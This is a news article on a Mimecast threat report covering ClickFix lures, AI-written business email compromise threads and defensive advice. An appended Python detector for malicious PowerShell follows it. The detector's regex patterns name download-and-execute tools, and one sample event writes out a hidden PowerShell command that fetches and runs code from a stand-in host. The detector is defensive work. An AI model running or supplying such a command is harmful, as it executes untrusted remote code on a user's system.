
ZDNET Highlights
- ClickFix attacks increased by 500% in early 2025.
- Cyber criminals now use AI in BEC scams.
- AI is making phishing harder to detect.
With social engineering and AI abuse becoming even more popular, cybercriminals are changing their techniques to focus on the human element.
On Wednesday, Mimecast published its latest global threat intelligence report, which monitored threat activity from January to September 2025 and analyzed trillions of signals.
The report on modern cyber threats includes the usual suspects: phishing, ransomware, exploitation of popular business tools like DocuSend, and industry-specific threats. However, two trends highlight a shift in tactics targeting the human element in scams, which are operating with greater efficiency on victims.
ClickFix rates increased
Many cybersecurity companies and tech giants, including Microsoft, are alerting users to ClickFix – a social engineering technique that is being adopted by threat actors around the world.
ClickFix is a method of bypassing traditional anti-phishing techniques by luring victims into providing initial access to a network or system, eliminating the need for the malware to do so. Fake error messages, seemingly minor technical problem alerts, and more suspicious messages – such as apparently free ways to install licensed software – are displayed to the victim with a simple step-by-step guide.
Unfortunately, these “guides” direct users to launch PowerShell and input commands that trigger the download of malicious payloads, including information stealers and ransomware.
Mimecast says ClickFix rates increased 500% in the first half of 2025, accounting for about 8% of all attacks.
Mimecast threat research engineer Hiwot Mendahun told ZDNET that threat actors are adopting ClickFix as a means of early access, and the company believes “it will continue to be used as a means to download infostealers, ransomware, remote access trojans (RATs), and custom malware.”
“The use of RMM (remote monitoring and management) tools to enable early access in the same way is also a vector in which we are seeing growth, with campaigns really focusing on the social engineering aspect,” Mendahun said.
New wave of AI-powered BEC scams
As with any new technological innovation, there is abuse. For example, artificial intelligence (AI) is being increasingly adopted in phishing and business email compromise (BEC) scams.
Although impersonating employees or high-profile executives in phishing and BEC scams is nothing new, AI is being employed in ways that make email chains seem more credible – and not just to create the initial phishing email.
Mimecast says AI is being used to generate complete conversation chains that impersonate multiple people, including vendors, executives, and third parties.
For example, during the reconnaissance phase, an attacker may find financial information and reports, HR data, and payroll information that can be used in AI-generated email threads. AI is then used to craft interactions between vendors, employees, and high-profile personalities, usually with a sense of urgency – such as a request to pay an invoice immediately.
Recent BEC attack vectors focus on fraudulent invoice payments, changes to bank account details, payroll updates, and wire transfers. The team believes that as the misuse of AI increases with the use of deepfake voice and video content, these scams will become even more difficult to detect. And as AI tools become readily available, more cybercriminals will be able to enter this field.
“The use of AI in these campaigns in particular gives threat actors the ability to mass produce more targeted threads using automation and potentially alter content to help bypass content-based detection,” Mendahun commented. “In addition to automated emails, we see the use of deep voice and video in BEC campaigns increasing the success rate of larger fraudulent transactions.”
Who is at risk?
According to Mimecast, education, IT, telecommunications, legal sectors, and real estate companies are most at risk of impersonation and social engineering-based attacks, “as these sectors often have direct access to high-value targets, handle sensitive financial transactions, and manage confidential customer information.”
With respect to real estate, the company says the rate of social engineering attacks continues to increase, which may indicate that some criminal groups are moving toward this sector and away from more traditional targets.
Groups including Scattered Spiders and TA2541 have been linked to attacks against these industries.
Recommendations
Phishing and social engineering attacks are nothing new, but the methods to conduct them are constantly evolving – and ClickFix techniques have added another dangerous element to the mix. Consider the following to reduce the risk of a successful intrusion:
- Increased control: By implementing additional authentication and authorization checks – preferably across multiple platforms or departments – unauthorized, fraudulent invoices and BEC-related payment requests are more likely to be caught before it is too late.
- Multi-Factor Authentication (MFA): Even if a phishing campaign is successful, using two-factor authentication (2FA) or MFA can reduce the risk of account hijacking.
- Training and Awareness: Employees, especially those with privileged status and access to sensitive resources or payment systems, should have regular training to detect phishing, BEC, and social engineering attempts. However, this does not mean a one-time annual training.
- Zero-trust architecture: When possible, organizations should consider implementing system architecture and controls based on zero-trust principles, so that employees do not have access to any resources that are not strictly necessary for their job roles, thereby reducing the attack surface.
- ClickFix: Traditional anti-phishing methods will not work against ClickFix social engineering tactics, as these are designed to lure victims into performing the malicious activity themselves. Raise awareness about ClickFix and emphasize that submitting commands to a machine when you are not sure what they will do is dangerous and can lead to a complete hijacking of the system.
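A defender-side illustration of the ClickFix point above, added here and not taken from ZDNET or the Mimecast report: because the victim launches the command, one place to look is process-creation telemetry for a shell started interactively with download-and-run arguments. The field names, the `explorer.exe` parent heuristic, the indicator list and the sample events are assumptions constructed for this example.

```python
import re

# Assumed, normalized process-creation fields (e.g. mapped from EDR or
# Sysmon Event ID 1 data); the field names are hypothetical.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
INTERACTIVE_PARENTS = {"explorer.exe"}  # command typed or pasted by the user

# Illustrative indicators of "fetch something remote and run it".
INDICATORS = {
    "remote_url": re.compile(r"https?://", re.I),
    "download": re.compile(
        r"\b(iwr|irm|curl|wget|invoke-webrequest|invoke-restmethod"
        r"|downloadstring|downloadfile)\b", re.I),
    "execute": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "encoded": re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}

def basename(path):
    return re.split(r"[\\/]", path)[-1].lower()

def score_event(event):
    """Return the sorted indicator names matched, or [] if out of scope."""
    if (basename(event["image"]) not in SHELLS
            or basename(event["parent_image"]) not in INTERACTIVE_PARENTS):
        return []
    cmd = event["command_line"]
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmd))

def triage(events, threshold=2):
    """Hosts and matched indicators for events worth an analyst's review."""
    scored = ((ev["host"], score_event(ev)) for ev in events)
    return [(host, hits) for host, hits in scored if len(hits) >= threshold]

# Constructed sample events, not taken from the Mimecast report.
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -c "iex (iwr https://example.invalid/fix)"'},
    {"host": "ws-02", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe Get-ChildItem C:\\Users"},
    {"host": "srv-03", "parent_image": r"C:\Program Files\Agent\agent.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd /c curl https://example.invalid/update -o u.bin"},
]
```

Only the first sample is flagged; the administrator's interactive listing and the agent-driven download fall below the threshold or outside the parent-process scope.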

